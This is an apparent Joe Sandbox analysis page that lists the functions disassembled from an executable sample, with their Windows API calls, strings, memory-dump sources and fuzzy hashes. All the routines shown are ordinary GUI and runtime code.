Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhValidatePathA
API String ID: 1866314245-780468058
Opcode ID: a1babbfd030d592ab9460b4f4ca992f797ec9d94fa699322efcb54d8d906a643
Instruction ID: ebee73c490b0158c8f842c472dd68b54666793da418550f794edfe683ecc21cd
Opcode Fuzzy Hash: a1babbfd030d592ab9460b4f4ca992f797ec9d94fa699322efcb54d8d906a643
Instruction Fuzzy Hash: 5CF0F4B1A002106BD610EF75EC059573BA8AB50749340843AF809D3661F7B4D4558B9E

Function 0040F305 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(PDH.DLL), ref: 0040F315
GetLastError.KERNEL32 ref: 0040F324
GetProcAddress.KERNEL32(?,PdhRemoveCounter), ref: 0040F33A
GetLastError.KERNEL32(?,PdhRemoveCounter), ref: 0040F349

Strings

PDH.DLL, xrefs: 0040F310
PdhRemoveCounter, xrefs: 0040F334

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ErrorLast$AddressLibraryLoadProc
String ID: PDH.DLL$PdhRemoveCounter
API String ID: 1866314245-2964615930
Opcode ID: 971bc45b7f6dafe8033ded42022ce485b48b7301531f432ee6402158f1c01ea3
Instruction ID: 21938c6e4e5df2ad7784f70923b7e4547b689520b881b2985449507a40e9f75a
Opcode Fuzzy Hash: 971bc45b7f6dafe8033ded42022ce485b48b7301531f432ee6402158f1c01ea3
Instruction Fuzzy Hash: EAF012B1A00310ABD610EB76EC05A573BA89E50799344883AEC09E3251FAB8D4558BAE

Function 00434827 Relevance: 10.5, APIs: 7, Instructions: 29COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 00434833
GetSysColor.USER32(00000010), ref: 0043483A
GetSysColor.USER32(00000014), ref: 00434841
GetSysColor.USER32(00000012), ref: 00434848
GetSysColor.USER32(00000006), ref: 0043484F
GetSysColorBrush.USER32(0000000F), ref: 0043485C
GetSysColorBrush.USER32(00000006), ref: 00434863

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: c36b291c026e49ce1e904f848bd08e3c3bb1f7b0efd31209cdfe3efd57b7850d
Instruction ID: 965955aaced6260f509e7d6ec729689777708b6152aac75f4190b44fc847f584
Opcode Fuzzy Hash: c36b291c026e49ce1e904f848bd08e3c3bb1f7b0efd31209cdfe3efd57b7850d
Instruction Fuzzy Hash: 1EF01C719417889BD730BF729D49B47BAE0FFC4B10F02092ED2858BA90E6B5E440DF44

Function 004459A7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 25registrywindowCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32 ref: 004459B4
GetVersion.KERNEL32 ref: 004459BF
GetVersion.KERNEL32 ref: 004459C7
GetVersion.KERNEL32 ref: 004459CD
RegisterWindowMessageA.USER32(MSWHEEL_ROLLMSG), ref: 004459DA

Strings

MSWHEEL_ROLLMSG, xrefs: 004459D5

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Version$MessageRegisterWindow
String ID: MSWHEEL_ROLLMSG
API String ID: 303823969-2485103130
Opcode ID: 0e2cc66dc778f63458917f7e6ec6ccd3444af2082c52e142ebe1934f50689546
Instruction ID: fe54f53fe3cbcf636732be9db517747af7156fe7d5c0217ec8c629924d5f3ccb
Opcode Fuzzy Hash: 0e2cc66dc778f63458917f7e6ec6ccd3444af2082c52e142ebe1934f50689546
Instruction Fuzzy Hash: 82E048B9410E5AD7FE113B64AC0137B1AA997543B1F514037DD00D32666B6C48434EBF

Function 0044E18B Relevance: 9.2, APIs: 6, Instructions: 182COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044E190
GetDC.USER32(?), ref: 0044E27F
ReleaseDC.USER32(?,?), ref: 0044E2B3
GetDeviceCaps.GDI32(?,00000058), ref: 0044E2CC
GetDeviceCaps.GDI32(?,0000005A), ref: 0044E2DC

Part of subcall function 0044FC28: __EH_prolog.LIBCMT ref: 0044FC2D

ShowScrollBar.USER32(?,00000001,00000000,00000001,00000001,00000001,0045A560,0045A560), ref: 0044E3A4

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CapsDeviceH_prolog$ReleaseScrollShow
String ID:
API String ID: 603669091-0
Opcode ID: 090dae0172aeb17e12b8c21daeddc03a31877f65ae702c0e2fcb3792e6b048a7
Instruction ID: 7fb213bebbe4ff4ae083d0faa5ad415e0fa1a3827927269174669a1d0814acce
Opcode Fuzzy Hash: 090dae0172aeb17e12b8c21daeddc03a31877f65ae702c0e2fcb3792e6b048a7
Instruction Fuzzy Hash: E4715B70600A00DFD729DF69C484AAABBF5FF48710F10456EE56ACB3A1DB35E845DB14

Function 0043EEA9 Relevance: 9.2, APIs: 6, Instructions: 168COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 0043EEBA
InflateRect.USER32(?,?,?), ref: 0043EED0
PtInRect.USER32(?,?,?), ref: 0043EF1C
PtInRect.USER32(?,?,?), ref: 0043EF62
PtInRect.USER32(?,?,?), ref: 0043EFAB
PtInRect.USER32(?,?,?), ref: 0043EFFF

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$ClientInflate
String ID:
API String ID: 256450704-0
Opcode ID: d832a00b5fea3ff1ef56b9b0b43da715fb57f859d99c59158e63f7b74ef88d89
Instruction ID: c008e6fdf713a79773ab6b16bc7febcd6e683e269ba0bb85acc231f1f34adef6
Opcode Fuzzy Hash: d832a00b5fea3ff1ef56b9b0b43da715fb57f859d99c59158e63f7b74ef88d89
Instruction Fuzzy Hash: 67610771A00609EFCF09DFA8D8949AEB7B5FF08300F10416AE806EB256E775EE45CB54

Function 00421784 Relevance: 9.1, APIs: 6, Instructions: 117COMMONLIBRARYCODE

Download Yara Rule

APIs

GetStringTypeW.KERNEL32(00000001,0045C580,00000001,00000000,?,00000100,00000000,0041BA06,00000001,00000020,00000100,?,00000000), ref: 004217C3
GetStringTypeA.KERNEL32(00000000,00000001,0045C57C,00000001,00000000,?,00000100,00000000,0041BA06,00000001,00000020,00000100,?,00000000), ref: 004217DD
GetStringTypeA.KERNEL32(00000000,?,00000100,00000020,00000001,?,00000100,00000000,0041BA06,00000001,00000020,00000100,?,00000000), ref: 00421811
MultiByteToWideChar.KERNEL32(0041BA06,00000101,00000100,00000020,00000000,00000000,?,00000100,00000000,0041BA06,00000001,00000020,00000100,?,00000000), ref: 00421849
MultiByteToWideChar.KERNEL32(0041BA06,00000001,00000100,00000020,?,00000100,?,00000100,00000000,0041BA06,00000001,00000020,00000100,?), ref: 0042189F
GetStringTypeW.KERNEL32(?,?,00000000,00000001,?,00000100,?,00000100,00000000,0041BA06,00000001,00000020,00000100,?), ref: 004218B1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: StringType$ByteCharMultiWide
String ID:
API String ID: 3852931651-0
Opcode ID: fddec11a51c1d110bf7f15458b4697d365c6c5b89aad63aff66c545814a03ef2
Instruction ID: d49307382e404ef7abc228305dd637db17ed18e0f664adf5361ea82f65ca120e
Opcode Fuzzy Hash: fddec11a51c1d110bf7f15458b4697d365c6c5b89aad63aff66c545814a03ef2
Instruction Fuzzy Hash: 74419F71A00229BFDF219F94DC85EEF7F78EB18750F100526F901D6260D3389A51CB99

Function 0044A6F2 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044A6F7
SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0044A732

Part of subcall function 00438B78: __EH_prolog.LIBCMT ref: 00438B7D
Part of subcall function 00438B78: GetDC.USER32(00000001), ref: 00438BA6

SelectObject.GDI32(?,00000000), ref: 0044A751
GetTextExtentPoint32A.GDI32(?,00000000,?,-00000024), ref: 0044A799
GetSystemMetrics.USER32(00000000), ref: 0044A7BB
SelectObject.GDI32(?,?), ref: 0044A7F8

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: H_prologObjectSelect$ExtentMessageMetricsPoint32SendSystemText
String ID:
API String ID: 3673216194-0
Opcode ID: 35b386a756e27a22ebd4b53ac46f3631860dd1116bb6e93a136eb035fd3402bb
Instruction ID: 4ecafc2effca2bf290ff71d60152d388c2ceaa04b4a81e383d8af2164e2d7796
Opcode Fuzzy Hash: 35b386a756e27a22ebd4b53ac46f3631860dd1116bb6e93a136eb035fd3402bb
Instruction Fuzzy Hash: 8D415CB1D4020AEFEB20EF95D8859AEFBB5FF08315F10802AF901A7251D7789A51CF55

Function 004423D0 Relevance: 9.1, APIs: 6, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 004423E1
SetCapture.USER32(?), ref: 004423F1
GetCapture.USER32 ref: 004423FD
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00442417
DispatchMessageA.USER32(?), ref: 00442449
GetCapture.USER32 ref: 004424A7

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Capture$Message$Dispatch
String ID:
API String ID: 3654672037-0
Opcode ID: 9e5a2aba60982f0f3cc96967315f3b2e717fffec429207dc39ca37e1587c6aa8
Instruction ID: 0f7ef9aeaf53a55eda9c80b0d65a1749bf0c31405ac518180c34591ccd9cb35a
Opcode Fuzzy Hash: 9e5a2aba60982f0f3cc96967315f3b2e717fffec429207dc39ca37e1587c6aa8
Instruction Fuzzy Hash: C431F831500205ABFB34BBE6CA8597F76A9EF40315F90042BB445D3261CABC9C81C77A

Function 0044AF2A Relevance: 9.1, APIs: 6, Instructions: 85memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

TlsGetValue.KERNEL32(0046D38C,0046D1D0,00000000,?,0046D38C,?,0044B192,0046D1D0,00000000,?,00000000,004490F7,0044879C,00449113,0043427A,00436840), ref: 0044AF35
EnterCriticalSection.KERNEL32(0046D3A8,00000010,?,0046D38C,?,0044B192,0046D1D0,00000000,?,00000000,004490F7,0044879C,00449113,0043427A,00436840), ref: 0044AF84
LeaveCriticalSection.KERNEL32(0046D3A8,00000000,?,0046D38C,?,0044B192,0046D1D0,00000000,?,00000000,004490F7,0044879C,00449113,0043427A,00436840), ref: 0044AF97
LocalAlloc.KERNEL32(00000000,00000004,?,0046D38C,?,0044B192,0046D1D0,00000000,?,00000000,004490F7,0044879C,00449113,0043427A,00436840), ref: 0044AFAD
LocalReAlloc.KERNEL32(?,00000004,00000002,?,0046D38C,?,0044B192,0046D1D0,00000000,?,00000000,004490F7,0044879C,00449113,0043427A,00436840), ref: 0044AFBF
TlsSetValue.KERNEL32(0046D38C,00000000), ref: 0044AFFB

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterLeave
String ID:
API String ID: 4117633390-0
Opcode ID: ac0147f12c4e981cef845226e58e7bd935fa4462024fd7924fefd62c954f9850
Instruction ID: d4f59fdfe2a71a9349747fa61f4e530b2487b7fff72d8fc67f55c87df9f9908d
Opcode Fuzzy Hash: ac0147f12c4e981cef845226e58e7bd935fa4462024fd7924fefd62c954f9850
Instruction Fuzzy Hash: 0131CE71100A05EFE724CF15C895E66B7A8FF48355F00852AF42AC7691EB74E819CFAA

Function 0042B130 Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON

Download Yara Rule

APIs

PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0042B158
GetWindowTextLengthA.USER32(?), ref: 0042B162
GetWindowTextA.USER32(?,00000000,00000000), ref: 0042B18A
SetTextColor.GDI32(?,00000000), ref: 0042B1CB
DrawTextA.USER32(?,00000000,000000FF,?,?), ref: 0042B1E3
SetTextColor.GDI32(?,?), ref: 0042B1F5

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Text$ColorWindow$DrawLength
String ID:
API String ID: 1177705772-0
Opcode ID: e045b37e587d92600f2cb6f5f5dc2b33c71a135f876173d2f36e45dedad125a9
Instruction ID: e1d1578a0a476f41bc49bc335afb87b54d4caa25e35f8f28efc21bebe6893642
Opcode Fuzzy Hash: e045b37e587d92600f2cb6f5f5dc2b33c71a135f876173d2f36e45dedad125a9
Instruction Fuzzy Hash: D9216D76600609AFD714CF58DC94ABB77A9EB84361F148119FD5587391CB34ED10CBA4

Function 004315A2 Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004315A7
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 004315F4
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00431616
GetCapture.USER32 ref: 00431628
SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00431637
WinHelpA.USER32(?,?,?,?), ref: 0043164B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSend$CaptureH_prologHelp
String ID:
API String ID: 432264411-0
Opcode ID: 5e2baf3c47fb02ca2bd2c57d39ad4a1906e354efdf3804894eac255abe88f642
Instruction ID: 7705d1281e7ed4fe0e465a1d3e2b065713c7ea91b9039335242df06fb2d495fa
Opcode Fuzzy Hash: 5e2baf3c47fb02ca2bd2c57d39ad4a1906e354efdf3804894eac255abe88f642
Instruction Fuzzy Hash: 83217F71600209BFEB216F61CC8AFBE77A9EF48754F04856EB101AA2E2CB759C009B14

Function 0044408E Relevance: 9.1, APIs: 6, Instructions: 79COMMON

Download Yara Rule

APIs

CopyRect.USER32(?,?), ref: 004440A4
FillRect.USER32(?,?,?), ref: 004440CC
FillRect.USER32(?,?,?), ref: 004440EF
CopyRect.USER32(?,?), ref: 004440F8
FillRect.USER32(?,?,?), ref: 00444120
FillRect.USER32(?,?,?), ref: 00444142

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Fill$Copy
String ID:
API String ID: 4194453840-0
Opcode ID: 5cba59cb74723318f4233a30f7f61c094d17f44323e180a96e84b4fd5bb7f51e
Instruction ID: 5f3e40bf0a3402f7b7c04466473a5ea4cf568e144611df9368285c10ee8f7bc4
Opcode Fuzzy Hash: 5cba59cb74723318f4233a30f7f61c094d17f44323e180a96e84b4fd5bb7f51e
Instruction Fuzzy Hash: 573167B5A0021AAFDF01CFA9CD85DAEBBF8FF08354B048566B918D7211D730E954DB94

Function 0043DAAC Relevance: 9.1, APIs: 6, Instructions: 76windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00440F1D

Part of subcall function 00438C2C: __EH_prolog.LIBCMT ref: 00438C31
Part of subcall function 00438C2C: GetWindowDC.USER32(?,?,?,0043A085,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00438C5A

GetClientRect.USER32(?,?), ref: 00440F3D
GetWindowRect.USER32(?,?), ref: 00440F4A

Part of subcall function 00438A2E: ScreenToClient.USER32(?,q"C), ref: 00438A42
Part of subcall function 00438A2E: ScreenToClient.USER32(?,?), ref: 00438A4B

OffsetRect.USER32(?,?,?), ref: 00440F71

Part of subcall function 00438878: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 0043889D
Part of subcall function 00438878: ExcludeClipRect.GDI32(?,?,?,?,?), ref: 004388B2

OffsetRect.USER32(?,?,?), ref: 00440F8F

Part of subcall function 004388BA: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004388DF
Part of subcall function 004388BA: IntersectClipRect.GDI32(?,?,?,?,?), ref: 004388F4

SendMessageA.USER32(?,00000014,?,00000000), ref: 00440FB6

Part of subcall function 00438C9E: __EH_prolog.LIBCMT ref: 00438CA3
Part of subcall function 00438C9E: ReleaseDC.USER32(?,00000000), ref: 00438CC2

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Rect$Clip$ClientH_prolog$ExcludeIntersectOffsetScreenWindow$MessageReleaseSend
String ID:
API String ID: 2727942566-0
Opcode ID: 3678649f087e81d6155b60e55873d8e34ac0130217880580c598b225f924e6d6
Instruction ID: 97fd1102a071d1d51995dd8a4e359b0ad62ca5507dc2f0795630dde8528ba6b6
Opcode Fuzzy Hash: 3678649f087e81d6155b60e55873d8e34ac0130217880580c598b225f924e6d6
Instruction Fuzzy Hash: D2211BB1D0021EABDF15EBA4DC55DEEB77CFB48315F00422AF512E3191DA38A906CB64

Function 0043D96A Relevance: 9.1, APIs: 6, Instructions: 73windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00438B78: __EH_prolog.LIBCMT ref: 00438B7D
Part of subcall function 00438B78: GetDC.USER32(00000001), ref: 00438BA6

SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0043D987
SelectObject.GDI32(?,00000000), ref: 0043D99E
GetTextMetricsA.GDI32(?,?), ref: 0043D9AA
SelectObject.GDI32(?,?), ref: 0043D9BB
SetRectEmpty.USER32(?), ref: 0043D9C9
GetSystemMetrics.USER32(00000006), ref: 0043D9FE

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MetricsObjectSelect$EmptyH_prologMessageRectSendSystemText
String ID:
API String ID: 1789613188-0
Opcode ID: fa21aef089f1e3d99c3140147c1983c12ad8cc1558a1d6fc13644e512e5d6294
Instruction ID: c94094aa586c7746a9127ec9b8c4c03a66ead0f5f26aceb5c75df22acb7ceeb6
Opcode Fuzzy Hash: fa21aef089f1e3d99c3140147c1983c12ad8cc1558a1d6fc13644e512e5d6294
Instruction Fuzzy Hash: 8021F472D00219AFDF04AFA4DD98DAEBBBAFF58304B14402AE901A7251DA34AE14CB54

Function 0043930F Relevance: 9.1, APIs: 6, Instructions: 69windowCOMMON

Download Yara Rule

APIs

LoadMenuA.USER32(?,?), ref: 0043934E
LoadAcceleratorsA.USER32(?,?), ref: 00439359
LoadMenuA.USER32(?,?), ref: 00439378
LoadAcceleratorsA.USER32(?,?), ref: 00439383
LoadMenuA.USER32(?,?), ref: 004393A2
LoadAcceleratorsA.USER32(?,?), ref: 004393AD

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
